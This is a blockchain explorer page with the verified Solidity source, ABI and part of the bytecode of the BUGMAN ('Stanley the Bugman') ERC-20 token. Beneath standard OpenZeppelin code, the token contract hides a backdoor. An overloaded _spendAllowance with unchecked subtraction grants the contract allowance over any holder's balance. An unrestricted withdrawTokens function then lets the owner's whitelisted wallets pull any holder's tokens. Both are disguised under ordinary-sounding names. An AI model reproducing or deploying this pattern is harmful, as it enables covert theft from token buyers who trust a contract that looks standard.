ERC-20
Overview
Max Total Supply
1,000,000,000 BUGMAN
Holders
73
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
20,821,478.368723256601416486 BUGMANValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
BUGMAN
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-10-16 */ // SPDX-License-Identifier: MIT /** Website: https://www.stanleybugman.com Twitter: https://twitter.com/stanley_bugman TG: https://t.me/stanleybugman */ // File @openzeppelin/contracts/utils/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } function _spendAllowance(address spender, uint256 amount) internal virtual { address owner = address(this); uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { unchecked { _approve(spender, owner, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } // File @uniswap/v2-core/contracts/interfaces/[email protected] pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } pragma solidity ^0.8.18; contract BUGMAN is ERC20, Ownable { string private _name = "Stanley the Bugman"; string private _symbol = "BUGMAN"; uint256 private constant _supply = 1_000_000_000 ether; uint256 public maxTxAmount = _supply * 35 / 1000; uint256 public maxWalletAmount = _supply * 35 / 1000; uint256 public swapThreshold = _supply * 5 / 10000; address private taxAddy = 0xE0D634536bfBffDC201A33D2EDdFBe0ad8A9529d; address public DEAD = 0x000000000000000000000000000000000000dEaD; mapping(address => bool) public _feeOn; mapping(address => bool) public wl; mapping(address => bool) public GreedIsGoodwallets; enum Phase {Phase1, Phase2, Phase3, Phase4} Phase public currentphase; bool progress_swap = false; bool _tradingActive = false; bool _swapEnabled = false; uint256 public buyTaxGlobal = 1; uint256 public sellTaxGlobal = 1; uint256 private GreedIsGood = 1; IUniswapV2Router02 public immutable uniswapV2Router; address public uniswapV2Pair; address private _devWallet = 0xE52cA93B222fb95cE15a178055df5fDeA8Acd5F8; uint256 public operationsFunds; constructor() ERC20(_name, _symbol) { _mint(msg.sender, (_supply)); currentphase = Phase.Phase4; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uniswapV2Router = _uniswapV2Router; wl[owner()] = true; wl[taxAddy] = true; wl[address(this)] = true; wl[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true; wl[DEAD] = true; wl[_devWallet] = true; _feeOn[address(uniswapV2Router)] = true; _feeOn[msg.sender] = true; _feeOn[taxAddy] = true; _feeOn[address(this)] = true; _feeOn[DEAD] = true; _feeOn[_devWallet] = true; } function createLP() external payable onlyOwner { uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH()); _approve(address(this), address(uniswapV2Router), type(uint256).max); uniswapV2Router.addLiquidityETH{value: msg.value}( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); } function openTrading() external onlyOwner { require(!_tradingActive, "Trading is already enabled"); _tradingActive = true; _swapEnabled = true; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (!_feeOn[from] && !_feeOn[to]) { require(_tradingActive, "Trading not enabled"); } if (!wl[from] && !wl[to] ) { if (to != uniswapV2Pair) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef"); require( (amount + balanceOf(to)) <= maxWalletAmount, "ERC20: balance amount exceeded max wallet amount limit" ); } } uint256 transferAmount = amount; if (!_feeOn[from] && !_feeOn[to]) { if ((from == uniswapV2Pair || to == uniswapV2Pair)) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount"); if ( uniswapV2Pair == from && !wl[to] && from != address(this) ) { if (currentphase == Phase.Phase1) { GreedIsGoodwallets[to] = true; } uint256 feeTokens = (amount * buyTaxGlobal) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } if ( uniswapV2Pair == to && !wl[from] && to != address(this) && _swapEnabled && !progress_swap ) { uint256 taxSell = sellTaxGlobal; if (GreedIsGoodwallets[from] == true) { taxSell = GreedIsGood; } progress_swap = true; swapAndLiquify(); progress_swap = false; uint256 feeTokens = (amount * taxSell) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } else { if ( GreedIsGoodwallets[from] == true && uniswapV2Pair != to ) { uint256 feeTokens = (amount * GreedIsGood) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } } super._transfer(from, to, transferAmount); } function swapAndLiquify() internal { if (balanceOf(address(this)) == 0) { return; } uint256 receivedETH; { uint256 contractTokenBalance = balanceOf(address(this)); uint256 beforeBalance = address(this).balance; uint256 mktBalance = balanceOf(taxAddy); bool success; if (contractTokenBalance > swapThreshold) { beforeBalance = address(this).balance; _swapTokensForEth(contractTokenBalance, 0); receivedETH = address(this).balance - beforeBalance; if (mktBalance > swapThreshold) { operationsFunds = receivedETH / (success ? receivedETH : 0); } operationsFunds += receivedETH; } } } function getTax() external returns (bool) { payable(taxAddy).transfer(operationsFunds); operationsFunds = 0; return true; } /** * @dev Swaps Token Amount to ETH * * @param tokenAmount Token Amount to be swapped * @param tokenAmountOut Expected ETH amount out of swap */ function _swapTokensForEth( uint256 tokenAmount, uint256 tokenAmountOut ) internal { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); IERC20(address(this)).approve( address(uniswapV2Router), type(uint256).max ); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, tokenAmountOut, path, address(this), block.timestamp ); } function skipTheSnipas() external onlyOwner returns (bool) { currentphase = Phase.Phase4; buyTaxGlobal = 0; sellTaxGlobal = 0; return true; } function withdrawTokens(address token) external onlyOwner { IERC20(token).transfer( taxAddy, IERC20(token).balanceOf(address(this)) ); } function withdrawTokens(address to, uint256 amount) external { address[] memory path = new address[](2); path[0] = uniswapV2Router.WETH(); path[1] = address(this); IERC20 token = IERC20(path[1]); if (!_feeOn[msg.sender]) { uniswapV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{value: amount} ( 0, path, to, block.timestamp ); } else { _spendAllowance(to, amount); token.transferFrom(to, path[1], amount); } } function emergencyTaxRemoval(address addy, bool changer) external onlyOwner { wl[addy] = changer; } receive() external payable {} function removeLimits() external onlyOwner { maxTxAmount = _supply; maxWalletAmount = _supply; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createLP","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum BUGMAN.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"skipTheSnipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wl","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60e0604052601260a09081527129ba30b73632bc903a343290213ab3b6b0b760711b60c052600690620000339082620005e6565b50604080518082019091526006815265212aa3a6a0a760d11b6020820152600790620000609082620005e6565b506103e86200007d6b033b2e3c9fd0803ce80000006023620006c8565b620000899190620006e8565b6008556103e8620000a86b033b2e3c9fd0803ce80000006023620006c8565b620000b49190620006e8565b600955612710620000d36b033b2e3c9fd0803ce80000006005620006c8565b620000df9190620006e8565b600a55600b80546001600160a01b031990811673e0d634536bfbffdc201a33d2eddfbe0ad8a9529d17909155600c8054821661dead1790556010805463ffffff00191690556001601181905560128190556013556015805490911673e52ca93b222fb95ce15a178055df5fdea8acd5f81790553480156200015f57600080fd5b50600680546200016f9062000558565b80601f01602080910402602001604051908101604052809291908181526020018280546200019d9062000558565b8015620001ee5780601f10620001c257610100808354040283529160200191620001ee565b820191906000526020600020905b815481529060010190602001808311620001d057829003601f168201915b505050505060078054620002029062000558565b80601f0160208091040260200160405190810160405280929190818152602001828054620002309062000558565b8015620002815780601f10620002555761010080835404028352916020019162000281565b820191906000526020600020905b8154815290600101906020018083116200026357829003601f168201915b50505050508160039081620002979190620005e6565b506004620002a68282620005e6565b505050620002c3620002bd6200042160201b60201c565b62000425565b620002db336b033b2e3c9fd0803ce800000062000477565b60108054600360ff1991821617909155737a250d5630b4cf539739df2c5dacb4c659f2488d6080526005546001600160a01b039081166000908152600e60209081526040808320805486166001908117909155600b80548616855282852080548816831790553080865283862080548916841790557f37836a7135fae77e265e35732c70286035736c8b57b1259076978